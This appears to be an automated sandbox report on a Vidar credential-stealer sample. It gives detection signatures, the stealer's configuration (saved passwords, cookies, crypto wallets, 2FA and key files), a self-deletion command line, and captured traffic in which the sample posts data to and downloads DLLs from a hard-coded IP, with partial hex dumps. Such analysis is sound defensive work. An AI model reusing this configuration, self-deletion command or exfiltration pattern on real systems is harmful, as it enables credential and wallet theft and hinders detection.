
Windows Analysis Report T6zZFfRLqs.exe

Overview

General Information

Sample Name: T6zZFfRLqs.exe
Analysis ID: 491601
MD5: 5d5e83e151a99bed97e13839e8881cb5
SHA1: 4f008fe578e0f32ed5dda8d30883a900630f1be4
SHA256: 1a0f891e8d7d659d550b35c54f542180cd2629d3a62e35e695e43fd1f5dad0b3
Tags: ArkeiStealer, exe

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected unpacking (overwrites its own PE header)
Yara detected Vidar
Yara detected Vidar stealer
Detected unpacking (changes PE section rights)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
Self deletion via cmd delete
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Enables debug privileges
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses taskkill to terminate processes
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • T6zZFfRLqs.exe (PID: 6576 cmdline: 'C:\Users\user\Desktop\T6zZFfRLqs.exe' MD5: 5D5E83E151A99BED97E13839E8881CB5)
    • cmd.exe (PID: 6820 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /im T6zZFfRLqs.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\T6zZFfRLqs.exe' & del C:\ProgramData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 6860 cmdline: taskkill /im T6zZFfRLqs.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • timeout.exe (PID: 6916 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Vidar

{"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security

Memory Dumps

Source | Rule | Description | Author
00000001.00000002.397797115.00000000007E2000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
Process Memory Space: T6zZFfRLqs.exe PID: 6576 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Unpacked PEs

Source | Rule | Description | Author
1.2.T6zZFfRLqs.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
1.2.T6zZFfRLqs.exe.21f0e50.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
1.2.T6zZFfRLqs.exe.21f0e50.1.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
1.3.T6zZFfRLqs.exe.2330000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
1.2.T6zZFfRLqs.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: HTTP data | Malware Configuration Extractor: Vidar {"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}
Machine Learning detection for sample
Source: T6zZFfRLqs.exe | Joe Sandbox ML: detected
Source: 1.2.T6zZFfRLqs.exe.21f0e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.3.T6zZFfRLqs.exe.2330000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00416200 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00416190 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00416340 _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Unpacked PE file: 1.2.T6zZFfRLqs.exe.400000.0.unpack
Source: T6zZFfRLqs.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140[1].dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
Source: Binary string: 0C:\zevubur.pdb source: T6zZFfRLqs.exe
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
Source: Binary string: C:\zevubur.pdb source: T6zZFfRLqs.exe
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3[1].dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0041B590 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00496670 FindFirstFileW,FindNextFileW,FindNextFileW,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0041B810 __wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0040EB20 _sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_00405D80 _memset,_memset,_memset,_memset,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,lstrcpyW,lstrcatW,_memset,_memset,_memset,_memset,FindClose,FindClose,_memset,_memset,_memset,_memset,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | Code function: 1_2_0040F150 _strtok,_strtok,_memmove,_memmove,__wgetenv,_memmove,__wgetenv,_memmove,_memmove,_memmove,_memmove,_memmove,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
    GET /@killern0 HTTP/1.1
    Host: mas.to
Source: global traffic | HTTP traffic detected:
    POST /1008 HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 25
    Host: 23.88.105.196
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
    Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected:
    GET /freebl3.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 23.88.105.196
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /mozglue.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 23.88.105.196
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /msvcp140.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 23.88.105.196
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /nss3.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 23.88.105.196
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /softokn3.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 23.88.105.196
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /vcruntime140.dll HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Host: 23.88.105.196
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST / HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
    Content-Length: 86263
    Host: 23.88.105.196
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 88.99.75.82 88.99.75.82
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:08 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:08 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:08 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:33:09 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:33:09 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 